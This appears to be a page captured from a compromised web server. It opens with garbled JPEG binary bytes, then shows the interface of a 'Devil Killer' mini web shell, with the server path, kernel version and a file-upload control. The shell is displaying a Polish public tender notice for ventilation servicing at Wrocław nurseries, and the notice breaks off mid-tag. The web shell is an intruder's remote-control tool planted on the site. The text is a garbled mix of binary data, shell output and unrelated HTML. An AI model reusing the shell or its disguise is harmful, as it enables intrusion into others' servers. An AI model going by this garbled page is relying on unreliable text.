JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240319/0025006301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wykonania przeglądów, usuwania awarii, przeprowadzenia napraw w centralach wentylacyjnych znajdujących się w budynkach Wrocławskiego Zespołu Żłobków – 2 zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wrocławski Zespół Żłobków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021545051</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fabryczna 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">53-609</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0717186246</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wzz.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bip.wzz.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi pielęgnacyjne, opiekuńcze, wychowawcze i edukacyjne dla dzieci zdrowych od ukończenia 20 tyg do 3 lat </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wykonania przeglądów, usuwania awarii, przeprowadzenia napraw w centralach wentylacyjnych znajdujących się w budynkach Wrocławskiego Zespołu Żłobków – 2 zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ea04849f-e5c0-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00250063</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00043406/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa wykonania przeglądów, usuwania awarii, przeprowadzenia napraw w centralach wentylacyjnych znajdujących się w budynkach Wrocławskiego Zespołu Żłobków – 2 zadania.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://asystent.postepowania.pl/org/wroclawski-zespol-zlobkow/postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia prowadzona jest w języku<br/>polskim. Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>odbywa się za pośrednictwem platformy zakupowej Wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym, a Wykonawcą z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej za pomocą platformy „Asystent Postępowania”, dostępnej pod adresem https://postepowania.pl/<br/>Postępowanie prowadzone jest na stronie internetowej, tj. na platformie „Asystent Postępowania”,<br/>Adres strony internetowej prowadzonego postępowania<br/>https://asystent.postepowania.pl/org/wroclawski-zespolzlobkow/postepowania<br/>Link do publicznej strony postępowania – dostęp bezpośredni <br/>https://asystent.postepowania.pl/org/wroclawski-zespol-zlobkow/postepowania/1295</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Instrukcja korzystania z programu<br/>Asystent Postępowania (dla Wykonawców) stanowi załącznik nr 7 do SWZ.<br/>Wymagania techniczne i organizacyjne co do korzystania z Asystenta postępowania zostały określone w Regulaminie korzystania<br/>usług, który dostępny jest do pobrania na stronie www.postepowania.pl.<br/>W przypadku pytań technicznych związanych z obsługą postępowań prosimy o kontakt z wsparciem merytorycznym:<br/>https://postepowania.pl/kontakt/<br/>pod nr telefonu 517590851 l.strzezynski@postepowania.pl<br/>oraz do doradcy ds. produktu - Nikita Mitar, T: +48 798 855 799,<br/>n.mitar@postepowania.pl) gdzie otrzymacie Państwo wsparcie techniczne od operatora systemu.<br/>Korzystanie z Asystenta postępowania jest bezpłatne. Ze względu na ograniczoną ilość znaków nie ma możliwości wpisania<br/>wszystkich wymagań technicznych i org. dotyczących korespondencji elektronicznej -<br/>INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE<br/>KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH<br/>SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ zostały określone w rozdziale IX SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">XV.	OBOWIAZEK INFORMACYJNY W PRZYPADKU ZBIERANIA DANYCH OSOBOWYCH BEZPOŚRDNIO OD OSOBY FIZYCZNEJ, KTÓREJ DANE DOTYCZĄ W CELU ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO:<br/>1.	Klauzula informacyjna o przetwarzaniu danych osobowych<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że: <br/>1)	Administratorem Danych Osobowych Wrocławskiego Zespołu Żłobków jest Dyrektor Wrocławskiego Zespołu Żłobków, adres: ul. Fabryczna 15, 53-609 Wrocław, nr kontaktowy 71 718 62 46, e-mail: zlobki@wzz.wroc.pl <br/>2)	Inspektor Ochrony Danych Osobowych Wrocławskiego Zespołu Żłobków dostępny jest pod adresem e-mail: renata.karpinska@wzz.wroc.pl, nr kontaktowy 71 718 62 53<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego;<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Znak sprawy: WZŻ.DZP/8/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Zadanie nr 1 – Wykonywanie usługi przeglądów oraz usuwanie awarii powstałych w układach wentylacji mechanicznej<br/>oraz wentylacjach kanałowych w 19 budynkach zarządzanych przez Wrocławski Zespół Żłobków;<br/>4. Zakres prac Wykonawcy dla zadania nr 1 obejmuje m. in.:<br/>Opis czynności do wykonania w ramach przeglądów i konserwacji wentylacji mechanicznych obejmuje:<br/>1) sprawdzenie stanu powierzchni obudowy centrali,<br/>2) czyszczenie i mycie powierzchni wewnętrznych centrali,<br/>3) sprawdzenie wypoziomowania centrali,<br/>4) oczyszczenie i sprawdzenie drożności oraz działania układu odprowadzenia skroplin, sprawdzenie stanu mocowań i<br/>uchwytów, kompletności obudów osłon, momentów dokręcenia śrub i wkrętów, ewentualne uzupełnienie brakujących<br/>elementów (np. śrub),<br/>5) sprawdzenie zamocowania centrali do ramy i śrub fundamentowych,<br/>6) sprawdzenie działania przepustnic wielopłaszczyznowych,<br/>7) sprawdzenie osadzenia filtrów,<br/>8) wymiana filtrów tkaninowych przy każdym przeglądzie,<br/>9) wymiana filtrów siatkowych przy każdym przeglądzie<br/>10) sprawdzenie ustawienia i zamocowania silników elektrycznych,<br/>11) sprawdzenie działania wirników wentylatorów poprzez ręczne uruchomienie,<br/>12) sprawdzenie stanu łożysk wentylatorów i silników (ewentualna wymiana łożysk),<br/>13) sprawdzenie płaszczyzny kół pasowych,<br/>14) sprawdzenie działania przekładni pasowej (z ewentualną wymianą),<br/>15) kontrola, a w razie konieczności wymiana pasków klinowych,<br/>16) sprawdzenie stanu zabrudzenia oraz działania grzałki nagrzewnicy (ewentualna wymiana, jeśli występuje),<br/>17) czyszczenie nagrzewnicy za pomocą sprężonego powietrza,<br/>18) sprawdzenie stanu zabrudzenia lamel chłodnicy,<br/>19) czyszczenie i mycie chłodnicy,<br/>20) sprawdzenie stanu odkraplaczy,<br/>21) sprawdzenie układu odprowadzenia skroplin,<br/>22) sprawdzenie pasków napędzających wymienniki oraz czyszczenie za pomocą sprężonego powietrza,<br/>23) uzupełnienie brakujących elementów (np. śrub),<br/>24) sprawdzenie stanu, ewentualna wymiana łożysk wentylatorów,<br/>25) sprawdzenie działania przekładni pasowej z ewentualną wymianą pasów,<br/>26) kontrola stanu izolacji cieplnej kanałów ewentualne jej uzupełnienie,<br/>27) sprawdzenie stanu zabrudzenia oraz działania grzałki nagrzewnicy z ewentualną jej wymiana, jeśli występuje,<br/>28) uruchomienie centrali, kontrola pracy,<br/>29) wykonanie pomiarów kontrolnych,<br/>30) kontrola poziomu hałasu pracy,<br/>31) sprawdzenie i analiza kodów błędów automatyki,<br/>32) dokonywanie wpisów do książek kontroli.<br/>Opis czynności do wykonania okresowych przeglądów i konserwacji wentylacji kanałowych obejmuje:<br/>1) kontrola szczelności instalacji wentylacyjnej,<br/>2) kontrola stanu izolacji cieplnej kanałów (ewentualne uzupełnienie),<br/>3) kontrola zatłuszczenia okapów i kanałów wentylacyjnych w kuchni (jeśli potrzeba oczyszczenie),<br/>4) dokonywanie wpisów do książek kontroli.<br/>5) Raz w roku przy pierwszym przeglądzie sprawdzenie wydajności wentylacji i poziomu hałasu – dotyczy wszystkich<br/>central wentylacyjnych i wentylatorów dachowych i kanałowych, (zgodnie z Normą PN-EN 12599:2013-04 – Procedury<br/>badań i metody pomiarowe stosowane podczas odbioru instalacji wentylacji i klimatyzacji w odniesieniu do PN-EN<br/>12792:2006 – Wentylacja budynków – Symbole, terminologia i oznaczenia na rysunkach).<br/>5. Specyfikacja Techniczna Wykonania Przeglądów Układów Wentylacyjnych stanowi<br/>załącznik nr 2 do wzoru umowy (załącznik nr 6 do SWZ dla zadania nr 1).<br/>6. Wykaz urządzeń wentylacyjnych zawiera załącznik nr 3 do wzoru umowy (załącznik nr 6 do SWZ dla zadania nr 1).<br/>7. Wykaz obiektów Zamawiającego i dane kontaktowe osób upoważnionych – załącznik nr 6 do umowy w zadaniu nr 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71315410-6 - Kontrola systemu wentylacji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">42520000-7 - Urządzenia wentylacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający na<br/>podstawie art.214 ust.1 pkt 7 ustawy Pzp przewiduje udzielenie<br/>w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi zamówienia polegającego na<br/>powtórzeniu podobnych prac, zgodnie<br/>z przedmiotem niniejszego postępowania, w wysokości do 80% wartości zamówienia podstawowego. Zamówienie może dotyczyć<br/>całego zakresu zamówienia podstawowego i może być realizowane w obiektach zarządzanych przez Zamawiającego.<br/>Zamówienie to będzie udzielone na zasadach określonych w umowie podstawowej, po przeprowadzeniu negocjacji.<br/>Dopuszcza się jedynie zmianę stawki roboczogodziny po upływie 6 miesięcy od dnia udzielenia zamówienia podstawowego o max.<br/>10% a po upływie 12 miesięcy<br/>o max 20%. Ceny materiałów i sprzętu podlegać będą negocjacjom w odniesieniu do aktualnych cen rynkowych. Udzielenie<br/>zamówienia jest uprawnieniem a nie obowiązkiem Zamawiającego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OPIS KRYTERIÓW OCENY OFERT, WRAZ Z PODANIEM ICH WAG I SPOSOBEM OCENY OFERT<br/>został określony w rozdziale XI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">55</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wskaźnik kosztów zakupu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – Naprawa układu wentylacyjnego w Żłobku nr 12 przy ul. Jugosłowiańskiej 85a we Wrocławiu. <br/>8.	Zakres prac Wykonawcy dla zadania nr 2 :<br/>Naprawa obejmuje centrale wentylacyjne: <br/>1)	N1W1 - centrala wentylacyjna nawiewno-wywiewna dachowa 5510/4610 m3/h VBW ENGINEERING Sp. z o.o. typ BD-3BIS (50) wyposażona w sekcję filtrów, wymiennik obrotowy, sekcję wentylatorów, tłumiki szumów i nagrzewnicę wodną KHW4 SPS-3 (50); Agregat chłodniczy LG Agregat ARUNO50L550 (608KCTB14N61) ARUNO50L550 (608KCJ2ONQ60)- lewa strona budynku, <br/>2)	NW2 - centrala wentylacyjna nawiewno-wywiewna dachowa 4540/4300 m3/h NW2 VBW ENGINEERING Sp. z o.o. typ BD-3 (50) wyposażona w sekcję filtrów, wymiennik obrotowy, sekcję wentylatorów, tłumiki szumów i nagrzewnicę wodną KHW4 SPS-3 (50); Agregaty chłodnicze LG Agregat ARUNO50L550 (608KCCVONQ67), ARUNO50L550 (608KCASONQ80),- centrala prawa strona budynku,<br/>3)	NW3- centrala wentylacyjna nawiewno-wywiewna dachowa 1820/1630 m3/h NW3 VBW ENGINEERING Sp. z o.o. typ BD-1 (50) wyposażona w sekcję przepustnicy, filtrów, zespoły odzysku glikolowego, odkraplacz, wymiennik obrotowy, sekcję wentylatorów, tłumiki szumów i nagrzewnicę wodną KHW4 SPS, Agregat LG ARUNO50L550 (608KCBONQ73) - centrala kuchnia, <br/>Zakres prac w obejmuje:<br/>1)	Centrala wentylacyjna NW1 -przerobienie instalacji doprowadzającej ciepło do centrali w celu wykonania dostępu do nieszczelnej chłodnicy,<br/>2)	Centrala wentylacyjna NW1- wymiana nieszczelnej chłodnicy freonowej centrali wentylacyjnej,<br/>3)	centrala wentylacyjna NW1- napełnienie instalacji chłodniczej czynnikiem chłodniczym,<br/>4)	centrala wentylacyjna NW1- pracuje w niewłaściwy sposób tzn. nie działa jeden z 2 podłączonych do niej agregatów chłodniczych. Uruchomienie niedziałającego agregatu wymaga rozbudowy automatyki centrali wentylacyjnej o odpowiednie moduły załączające, które nie zostały nigdy w niej zamontowane, <br/>5)	Centrala wentylacyjna NW2 - pracuje w niewłaściwy sposób tzn. nie działa jeden z 2 podłączonych do niej agregatów chłodniczych. Uruchomienie niedziałającego agregatu wymaga rozbudowy automatyki centrali wentylacyjnej o odpowiednie moduły załączające, które nie zostały nigdy w niej zamontowane, <br/>6)	Centrala wentylacyjna NW3 - pracuje w niewłaściwy sposób tzn. nie działa jeden z 2 podłączonych do niej agregatów chłodniczych. Uruchomienie niedziałającego agregatu wymaga rozbudowy automatyki centrali wentylacyjnej o odpowiednie moduły załączające, które nie zostały nigdy w niej zamontowane, <br/>7)	Centrala NW3 -przerobienie podłączenia sterowania wentylatora dla kuchni. Przełączenie wentylatora z centrali NW2 do NW3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71315410-6 - Kontrola systemu wentylacji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">42520000-7 - Urządzenia wentylacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 